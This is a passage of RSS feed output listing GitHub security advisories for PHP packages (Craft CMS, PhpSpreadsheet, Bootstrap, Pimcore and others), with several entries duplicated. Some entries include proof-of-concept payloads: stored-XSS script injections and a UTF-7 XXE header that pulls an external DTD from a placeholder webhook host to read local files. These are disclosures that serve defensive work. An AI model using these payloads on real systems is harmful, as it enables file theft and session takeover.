<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[craftcms/cms] Craft CMS vulnerable to stored XSS in breadcrumb list and title fields</title>
<description><h3 id="summary">Summary</h3>
<p>Multiple Stored XSS can be triggered by the breadcrumb list and title fields with user input.</p>
<h3 id="details">Details</h3>
<ol>
<li>In the <strong>/admin/categories</strong> page, category title isn't sanitized and triggered xss.</li>
<li>In the category edit page under the <strong>/admin/categories/</strong>, category title in breadcrumb list isn't sanitized and triggered xss.</li>
<li>In the <strong>/admin/entries</strong> page, entry title isn't sanitized and triggered xss.</li>
<li>In the entry edit page under the <strong>/admin/entries/</strong>, entry title in breadcrumb list isn't sanitized and triggered xss.</li>
<li>In the <strong>/admin/myaccount</strong> and pages under it, username or full name in breadcrumb list isn't sanitized and triggered xss.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Malicious users can tamper with the control panel.</p>
<h3 id="poc">PoC</h3>
<h4 id="1-in-the-admincategories-page-category-title-isnt-sanitized-and-triggered-xss">1. In the <strong>/admin/categories</strong> page, category title isn't sanitized and triggered xss.</h4>
<pre><code>1. Access to the Settings -&gt; Categories ( /admin/settings/categories )
2. Create new category group
3. Access to the Categories page ( /admin/categories/ )
4. Push the New category button
5. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
6. Push the Create Category or Save button
7. Access to the Categories page again and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a1b2890e-731b-4fc4-b189-26591f4486fd" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/4e0f35c7-fbb0-4d38-a0b5-9e28750ff706" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/e046b9db-d83c-4f81-ad91-165c5afedeb9" referrerpolicy="no-referrer"></p>
<h4 id="2-in-the-category-edit-page-under-the-admincategories-category-title-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">2. In the category edit page under the <strong>/admin/categories/</strong>, category title in breadcrumb list isn't sanitized and triggered xss.</h4>
<pre><code>1. Access to the Settings -&gt; Categories ( /admin/settings/categories )
2. Create new category group
3. Access to the Categories page ( /admin/categories/ )
4. Push the New category button
5. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
6. Push the Create Category or Save button
7. Access to the Category edit page again and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a1b2890e-731b-4fc4-b189-26591f4486fd" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/f7543a11-58eb-4099-9ee2-3461816c52ea" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/f01bbb80-4417-42ca-bf51-b38860f6c74a" referrerpolicy="no-referrer"></p>
<h4 id="3-in-the-adminentries-page-entry-title-isnt-sanitized-and-triggered-xss">3. In the <strong>/admin/entries</strong> page, entry title isn't sanitized and triggered xss.</h4>
<pre><code>1. Access to the Settings -&gt; Entry Types ( /admin/settings/entry-types )
2. Create new entry type
3. Access to the Settings -&gt; Sections ( /admin/settings/sections )
4. Create new section
5. Access to the Entries page ( /admin/entries )
6. Push the New entry button
7. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
8. Push the Create entry or Save button
9. Access to the Entries page again and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/ba700899-947f-4421-a1b7-3f0cc2c0da30" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/b255a999-e48c-46be-b732-4482ea9cee9a" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/445d8e0c-71b6-49c7-8f4a-37541dcc9c85" referrerpolicy="no-referrer"></p>
<h4 id="4-in-the-entry-edit-page-under-the-adminentries-entry-title-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">4. In the entry edit page under the <strong>/admin/entries/</strong>, entry title in breadcrumb list isn't sanitized and triggered xss.</h4>
<pre><code>1. Access to the Settings -&gt; Entry Types ( /admin/settings/entry-types )
2. Create new entry type
3. Access to the Settings -&gt; Sections ( /admin/settings/sections )
4. Create new section
5. Access to the Entries page ( /admin/entries )
6. Push the New entry button
7. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
8. Push the Create entry or Save button
9. Access to the Entriy edit page again and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/ba700899-947f-4421-a1b7-3f0cc2c0da30" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a59a122b-b9e7-4695-be13-eb8a1c2d36df" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/b0d27446-7ac6-47e7-ac02-20c924698b13" referrerpolicy="no-referrer"></p>
<h4 id="5-in-the-adminmyaccount-and-pages-under-it-username-or-full-name-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">5. In the <strong>/admin/myaccount</strong> and pages under it, username or full name in breadcrumb list isn't sanitized and triggered xss.</h4>
<pre><code>1. Access to the My Account Page ( /admin/myaccount )
2. Input the Full Name column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
3. Push the the Save button
4. Access to the My Account page ( /admin/myaccount ) or pages under it ( /admin/myaccount/addresses , /admin/myaccount/preferences , etc.) and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/3be45bdd-0757-42a8-bc5d-320ab2339fd0" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/e1be7446-1c54-42bc-af9a-a8ac81a2d7bf" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/5fa06b26-fecd-40f5-bc8b-171f881f8a2a" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/craftcms/cms/security/advisories/GHSA-28h4-788g-rh42">https://github.com/craftcms/cms/security/advisories/GHSA-28h4-788g-rh42</a></li>
<li><a href="https://github.com/craftcms/cms/commit/b7348942f8131b3868ec6f46d615baae50151bb8">https://github.com/craftcms/cms/commit/b7348942f8131b3868ec6f46d615baae50151bb8</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45406">https://nvd.nist.gov/vuln/detail/CVE-2024-45406</a></li>
<li><a href="https://github.com/advisories/GHSA-28h4-788g-rh42">https://github.com/advisories/GHSA-28h4-788g-rh42</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-28h4-788g-rh42</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-28h4-788g-rh42</guid>
<author>GitHub</author>
</item>
<item>
<title>[nategood/httpful] Httpful is Missing Certificate Validation</title>
<description><p>Httpful has Insecure HTTPS Connections due to Missing Default Certificate Validation</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/nategood/httpful/issues/247">https://github.com/nategood/httpful/issues/247</a></li>
<li><a href="https://github.com/nategood/httpful/commit/44c880e4f559e9215dc6ea9fe50315500c6c2c84">https://github.com/nategood/httpful/commit/44c880e4f559e9215dc6ea9fe50315500c6c2c84</a></li>
<li><a href="https://github.com/FriendsOfPHP/security-advisories/blob/master/nategood/httpful/2024-05-01.yaml">https://github.com/FriendsOfPHP/security-advisories/blob/master/nategood/httpful/2024-05-01.yaml</a></li>
<li><a href="https://github.com/nategood/httpful/blob/fc8e4274a09529a6ff29b9c6c0a105ee43dbfda5/src/Httpful/Request.php#L35">https://github.com/nategood/httpful/blob/fc8e4274a09529a6ff29b9c6c0a105ee43dbfda5/src/Httpful/Request.php#L35</a></li>
<li><a href="https://huntr.com/bounties/8d59c089-92f1-4b73-90f8-54968a70e2fb">https://huntr.com/bounties/8d59c089-92f1-4b73-90f8-54968a70e2fb</a></li>
<li><a href="https://github.com/advisories/GHSA-gcfg-hmwx-wq5h">https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</guid>
<author>GitHub</author>
</item>
<item>
<title>[twbs/bootstrap] Bootstrap Cross-Site Scripting (XSS) vulnerability</title>
<description><p>A vulnerability has been identified in Bootstrap that exposes users to Cross-Site Scripting (XSS) attacks. The issue is present in the carousel component, where the data-slide and data-slide-to attributes can be exploited through the href attribute of an <a> tag due to inadequate sanitization. This vulnerability could potentially enable attackers to execute arbitrary JavaScript within the victim's browser.</a></p><a>
<h3 id="references">References</h3>
</a><ul><a>
</a><li><a></a><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-6531">https://nvd.nist.gov/vuln/detail/CVE-2024-6531</a></li>
<li><a href="https://www.herodevs.com/vulnerability-directory/cve-2024-6531">https://www.herodevs.com/vulnerability-directory/cve-2024-6531</a></li>
<li><a href="https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bootstrap/CVE-2024-6531.yml">https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bootstrap/CVE-2024-6531.yml</a></li>
<li><a href="https://github.com/advisories/GHSA-vc8w-jr9v-vj7f">https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</guid>
<author>GitHub</author>
</item>
<item>
<title>[reportico-web/reportico] SQL Injection vulnerability in Reportico Till</title>
<description><p>SQL Injection vulnerability in Reportico Till 8.1.0 allows attackers to obtain sensitive information or other system information via the project parameter.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-47438">https://nvd.nist.gov/vuln/detail/CVE-2023-47438</a></li>
<li><a href="https://github.com/reportico-web/reportico/issues/52">https://github.com/reportico-web/reportico/issues/52</a></li>
<li><a href="https://github.com/advisories/GHSA-jjf4-959w-f545">https://github.com/advisories/GHSA-jjf4-959w-f545</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-jjf4-959w-f545</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-jjf4-959w-f545</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] PhpSpreadsheet HTML writer is vulnerable to Cross-Site Scripting via style information</title>
<description><h3 id="summary">Summary</h3>
<p><code>\PhpOffice\PhpSpreadsheet\Writer\Html</code> doesn't sanitize spreadsheet styling information such as font names, allowing an attacker to inject arbitrary JavaScript on the page.</p>
<h3 id="poc">PoC</h3>
<p>Example target script:</p>
<pre><code>&lt;?php
require 'vendor/autoload.php';
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader("Xlsx");
$spreadsheet = $reader-&gt;load(__DIR__ . '/book.xlsx');
$writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet);
print($writer-&gt;generateHTMLAll());
</code></pre>
<p>Save this file in the same directory:
<a href="https://github.com/PHPOffice/PhpSpreadsheet/files/15212797/book.xlsx">book.xlsx</a></p>
<p>Open index.php in a web browser. An alert should be displayed.</p>
<h3 id="impact">Impact</h3>
<p>Full takeover of the session of users viewing spreadsheet files as HTML.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45046">https://nvd.nist.gov/vuln/detail/CVE-2024-45046</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/pull/3957">https://github.com/PHPOffice/PhpSpreadsheet/pull/3957</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667">https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667</a></li>
<li><a href="https://github.com/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-wgmf-q9vr-vww6</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] PhpSpreadsheet HTML writer is vulnerable to Cross-Site Scripting via style information</title>
<description><h3 id="summary">Summary</h3>
<p><code>\PhpOffice\PhpSpreadsheet\Writer\Html</code> doesn't sanitize spreadsheet styling information such as font names, allowing an attacker to inject arbitrary JavaScript on the page.</p>
<h3 id="poc">PoC</h3>
<p>Example target script:</p>
<pre><code>&lt;?php
require 'vendor/autoload.php';
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader("Xlsx");
$spreadsheet = $reader-&gt;load(__DIR__ . '/book.xlsx');
$writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet);
print($writer-&gt;generateHTMLAll());
</code></pre>
<p>Save this file in the same directory:
<a href="https://github.com/PHPOffice/PhpSpreadsheet/files/15212797/book.xlsx">book.xlsx</a></p>
<p>Open index.php in a web browser. An alert should be displayed.</p>
<h3 id="impact">Impact</h3>
<p>Full takeover of the session of users viewing spreadsheet files as HTML.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45046">https://nvd.nist.gov/vuln/detail/CVE-2024-45046</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/pull/3957">https://github.com/PHPOffice/PhpSpreadsheet/pull/3957</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667">https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667</a></li>
<li><a href="https://github.com/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-wgmf-q9vr-vww6</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] XXE in PHPSpreadsheet encoding is returned</title>
<description><h3 id="summary">Summary</h3>
<p>Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) </p>
<h3 id="details">Details</h3>
<p>Check <code> $pattern = '/encoding="(.*?)"/';</code> easy to bypass. Just use a single quote symbol <code>'</code>. So payload looks like this:</p>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<p>If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. </p>
<h3 id="poc">PoC</h3>
<ol>
<li>Create simple xlsx file</li>
<li>Rename xlsx to zip</li>
<li>Go to the zip and open the <code>xl/sharedStrings.xml</code> file in edit mode.</li>
<li>Replace <code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</code> to</li>
</ol>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<ol start="5">
<li>Save <code>sharedStrings.xml</code> file and rename zip back to xlsx.</li>
<li>Use minimal php code that simply opens this xlsx file:</li>
</ol>
<pre><code>use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
</code></pre>
<ol start="7">
<li>You will receive the request to your <code>http://%webhook%/file.dtd</code></li>
<li>Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Read local files
<img alt="lfi" src="https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45048">https://nvd.nist.gov/vuln/detail/CVE-2024-45048</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda">https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ghg6-32f9-2jp7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/pimcore] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/pimcore] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/admin-ui-classic-bundle] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/admin-ui-classic-bundle] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/admin-ui-classic-bundle] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
</channel>
</rss>... |
http://localhost:1200/github-advisor/data/composer - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - composer</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github-advisor/data/composer" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - composer - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Fri, 13 Sep 2024 16:32:36 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>[phpoffice/phpspreadsheet] XXE in PHPSpreadsheet encoding is returned</title>
<description><h3 id="summary">Summary</h3>
<p>Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) </p>
<h3 id="details">Details</h3>
<p>Check <code> $pattern = '/encoding="(.*?)"/';</code> easy to bypass. Just use a single quote symbol <code>'</code>. So payload looks like this:</p>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<p>If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. </p>
<h3 id="poc">PoC</h3>
<ol>
<li>Create simple xlsx file</li>
<li>Rename xlsx to zip</li>
<li>Go to the zip and open the <code>xl/sharedStrings.xml</code> file in edit mode.</li>
<li>Replace <code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</code> to</li>
</ol>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<ol start="5">
<li>Save <code>sharedStrings.xml</code> file and rename zip back to xlsx.</li>
<li>Use minimal php code that simply opens this xlsx file:</li>
</ol>
<pre><code>use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
</code></pre>
<ol start="7">
<li>You will receive the request to your <code>http://%webhook%/file.dtd</code></li>
<li>Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Read local files
<img alt="lfi" src="https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45048">https://nvd.nist.gov/vuln/detail/CVE-2024-45048</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda">https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ghg6-32f9-2jp7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] XXE in PHPSpreadsheet encoding is returned</title>
<description><h3 id="summary">Summary</h3>
<p>Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) </p>
<h3 id="details">Details</h3>
<p>Check <code> $pattern = '/encoding="(.*?)"/';</code> easy to bypass. Just use a single quote symbol <code>'</code>. So payload looks like this:</p>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<p>If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. </p>
<h3 id="poc">PoC</h3>
<ol>
<li>Create simple xlsx file</li>
<li>Rename xlsx to zip</li>
<li>Go to the zip and open the <code>xl/sharedStrings.xml</code> file in edit mode.</li>
<li>Replace <code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</code> to</li>
</ol>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<ol start="5">
<li>Save <code>sharedStrings.xml</code> file and rename zip back to xlsx.</li>
<li>Use minimal php code that simply opens this xlsx file:</li>
</ol>
<pre><code>use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
</code></pre>
<ol start="7">
<li>You will receive the request to your <code>http://%webhook%/file.dtd</code></li>
<li>Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Read local files
<img alt="lfi" src="https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
